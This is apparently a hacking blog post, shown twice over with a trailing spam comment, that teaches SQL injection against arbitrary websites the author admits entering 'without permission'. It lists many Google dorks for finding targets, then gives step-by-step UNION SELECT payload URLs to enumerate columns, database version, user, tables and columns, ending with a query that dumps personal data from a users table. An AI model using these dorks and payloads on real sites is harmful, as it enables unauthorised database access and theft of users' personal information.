OK guys Today I'm going to post the 1st article of this blog.
So I thought of giving you a first lesson on Sql Injection.
The vulnerability is occurred when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.
What we do here is using these Sql errors and bypassing the security of the particular web site and enter to the data bass with out permission.
Step one is to find a website which is vulnerable to the SQL attacks This is the most time consuming method. You have to be patient. OK now, let us all know what kind of pages are vulnerable to this attack. We use Google to do this. Below are some of the Google Dorks which are used for this.
Dorks:
"inurl:index.php?catid="
"inurl:news.php?catid="
"inurl:index.php?id="
"inurl:news.php?id="
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
So OK now how to check if a webpage is vulnerable to this attack?
Once you execute the dorks and get the particular search results. Say for example
http://www.xyz.com/index.php?catid=1
Add a ' (apostrophe) at the end of the URL. So that the URL looks like
http://www.xyz.com/index.php?catid=1'
If the page returns an SQL error, the page is vulnerable to SQLiI and that means you can continue your SQL injection on this website.
Typical Error messages are
Warning: mysql_num_rows():
Warning: mysql_result():
Warning: mysql_fetch_assoc():
Warning: mysql_numrows():
Step 2 - Think that you have found a web site that is vulnerable for sqli attaks. Follow as below ;
first you need to enumerate the number of columns and those columns that are accepting the queries from you.
To do so you have to use the order by statement. Remove the apostrophe from the previous email and use order by statement as following.
ex - http://www.xyz.com/index.php?catid=1 order by 1
Continue increasing the number after order by till you get an error. So the highest number for which you do not get an error is the number of columns in the table. Now to know the column numbers which are accepting the queries.
ex - Imagine http://www.xyz.com/index.php?catid=1 order by 5:you don't get an error message But http://www.xyz.com/index.php?catid=1 order by 6 : you get an error message ; If so the total number of the columns is 5
Step 3 - Now to know the column numbers which are accepting the queries. To do so as usual you have to use another statement called "union select"
use a 'Union Select' statement to the URL. Also precede the number after "id=" with a hyphen or minus.
Say from the above step, you got that the table has 5 columns.
ex -. http://www.xyz.com/index.php?catid=-1 union select 1,2,3,4,5
Imagine Result of this query will be the column numbers that are accepting the queries are get 2,3,4 as the result. Now we'll inject our SQL statements in one of these columns.
Step 4 - The next step is Enumerating the SQL version
We'll use the mysql command @@version or version() to get the version of the database . We have to inject the command in one of the open columns. imagine we use column number 2. So replace the 2 in ". http://www.xyz.com/index.php?catid=-1 union select 1,2,3,4,5" with the statement "@@version or version()". So it may look alike below.
http://www.xyz.com/index.php?catid=-1 union select 1,@@version or version(),3,4,5
You'll get the version of the database in the place where you had got the number 2.
Step 5 - Exploitation
To get list of databases you have to use the statement "group_concat(schema_name)" .Do as below
"http://www.xyz.com/index.php?catid=-1 union select 1,group_concat(schema_name),3,4,5 from information_schema.schemata--"
Result will display a list of databases on the site. Result: information_schema,vrk_mlm
IMPORTANT - From here we are going to write down the results that we get in a paper . So it's good find some piece of paper and a pen.
Step 5 -
Now to know the current database in use you have to use "concat(database())" as following
" http://www.xyz.com/index.php?catid=-1 union select 1,concat(database()),3,4,5,6--"
ex - Result: vrk_mlm
Step 6 -
To get the current user use the command "concat(user())" as mentioned below.
"http://www.xyz.com/index.php?catid=-1 union select 1,concat(user()),3,4,5,6--"
Result: vrk_4mlm@localhost
Step 7 -
To get the tables use "group_concat(table_name)" as mentioned below
" http://www.abcd.com/index.php?catid=-1 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()--"
ex - Result: administrator,category,product,users
For an example we'll concentrate our attack on the "users" table.
Step 8 -
To get the columns do as following.
http://www.xyz.com/index.php?catid=-1 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()--
ex - Result: admin_id,user_name,password,user_type,status,catID,catName,prodId,catID,prodName,prodDesc,
prodKeyword,prodPrice,prodImage,id,incredible_id,f_name,m_name,l_name,refered_by_id,
refered_direct_to_ids,refered_to_ids,no_of_direct_referals,credits,position,
email_id,password,edited_on,last_login,created_on,chain_number,phone,address
By looking at the columns closely, and the order of the tables, we can understand that starting from id,incredible_id are the columns belonging to the users table and now we are going to target these colmns.
LAST STEP
Extract information from the coolumns. Do as following mentioned.
example only !! you have to input the discovered items from the above step below.
"http://www.xyz.com/index.php?catid=-1 union select group_concat(id,0x3a,incredible_id,0x3a,f_name,0x3a,m_name,0x3a,l_name,0x3a,refered_by_id,0
x3a,refered_direct_to_ids,0x3a) from vrk_mlm.users--"
I hope this Tutorial is useful to you all and yeah in the future there is more to come ! So Stay tuned with us.
And if this post was useful to you don't forget to share this and bookmark our blog. Thank you
Happy Hacking.
So I thought of giving you a first lesson on Sql Injection.
The vulnerability is occurred when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.
What we do here is using these Sql errors and bypassing the security of the particular web site and enter to the data bass with out permission.
Step one is to find a website which is vulnerable to the SQL attacks This is the most time consuming method. You have to be patient. OK now, let us all know what kind of pages are vulnerable to this attack. We use Google to do this. Below are some of the Google Dorks which are used for this.
Dorks:
"inurl:index.php?catid="
"inurl:news.php?catid="
"inurl:index.php?id="
"inurl:news.php?id="
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
So OK now how to check if a webpage is vulnerable to this attack?
Once you execute the dorks and get the particular search results. Say for example
http://www.xyz.com/index.php?catid=1
Add a ' (apostrophe) at the end of the URL. So that the URL looks like
http://www.xyz.com/index.php?catid=1'
If the page returns an SQL error, the page is vulnerable to SQLiI and that means you can continue your SQL injection on this website.
Typical Error messages are
Warning: mysql_num_rows():
Warning: mysql_result():
Warning: mysql_fetch_assoc():
Warning: mysql_numrows():
Step 2 - Think that you have found a web site that is vulnerable for sqli attaks. Follow as below ;
first you need to enumerate the number of columns and those columns that are accepting the queries from you.
To do so you have to use the order by statement. Remove the apostrophe from the previous email and use order by statement as following.
ex - http://www.xyz.com/index.php?catid=1 order by 1
Continue increasing the number after order by till you get an error. So the highest number for which you do not get an error is the number of columns in the table. Now to know the column numbers which are accepting the queries.
ex - Imagine http://www.xyz.com/index.php?catid=1 order by 5:you don't get an error message But http://www.xyz.com/index.php?catid=1 order by 6 : you get an error message ; If so the total number of the columns is 5
Step 3 - Now to know the column numbers which are accepting the queries. To do so as usual you have to use another statement called "union select"
use a 'Union Select' statement to the URL. Also precede the number after "id=" with a hyphen or minus.
Say from the above step, you got that the table has 5 columns.
ex -. http://www.xyz.com/index.php?catid=-1 union select 1,2,3,4,5
Imagine Result of this query will be the column numbers that are accepting the queries are get 2,3,4 as the result. Now we'll inject our SQL statements in one of these columns.
Step 4 - The next step is Enumerating the SQL version
We'll use the mysql command @@version or version() to get the version of the database . We have to inject the command in one of the open columns. imagine we use column number 2. So replace the 2 in ". http://www.xyz.com/index.php?catid=-1 union select 1,2,3,4,5" with the statement "@@version or version()". So it may look alike below.
http://www.xyz.com/index.php?catid=-1 union select 1,@@version or version(),3,4,5
You'll get the version of the database in the place where you had got the number 2.
Step 5 - Exploitation
To get list of databases you have to use the statement "group_concat(schema_name)" .Do as below
"http://www.xyz.com/index.php?catid=-1 union select 1,group_concat(schema_name),3,4,5 from information_schema.schemata--"
Result will display a list of databases on the site. Result: information_schema,vrk_mlm
IMPORTANT - From here we are going to write down the results that we get in a paper . So it's good find some piece of paper and a pen.
Step 5 -
Now to know the current database in use you have to use "concat(database())" as following
" http://www.xyz.com/index.php?catid=-1 union select 1,concat(database()),3,4,5,6--"
ex - Result: vrk_mlm
Step 6 -
To get the current user use the command "concat(user())" as mentioned below.
"http://www.xyz.com/index.php?catid=-1 union select 1,concat(user()),3,4,5,6--"
Result: vrk_4mlm@localhost
Step 7 -
To get the tables use "group_concat(table_name)" as mentioned below
" http://www.abcd.com/index.php?catid=-1 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()--"
ex - Result: administrator,category,product,users
For an example we'll concentrate our attack on the "users" table.
Step 8 -
To get the columns do as following.
http://www.xyz.com/index.php?catid=-1 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()--
ex - Result: admin_id,user_name,password,user_type,status,catID,catName,prodId,catID,prodName,prodDesc,
prodKeyword,prodPrice,prodImage,id,incredible_id,f_name,m_name,l_name,refered_by_id,
refered_direct_to_ids,refered_to_ids,no_of_direct_referals,credits,position,
email_id,password,edited_on,last_login,created_on,chain_number,phone,address
By looking at the columns closely, and the order of the tables, we can understand that starting from id,incredible_id are the columns belonging to the users table and now we are going to target these colmns.
LAST STEP
Extract information from the coolumns. Do as following mentioned.
example only !! you have to input the discovered items from the above step below.
"http://www.xyz.com/index.php?catid=-1 union select group_concat(id,0x3a,incredible_id,0x3a,f_name,0x3a,m_name,0x3a,l_name,0x3a,refered_by_id,0
x3a,refered_direct_to_ids,0x3a) from vrk_mlm.users--"
I hope this Tutorial is useful to you all and yeah in the future there is more to come ! So Stay tuned with us.
And if this post was useful to you don't forget to share this and bookmark our blog. Thank you
Happy Hacking.
useful post. hope that will help
ReplyDeletejealousy quotes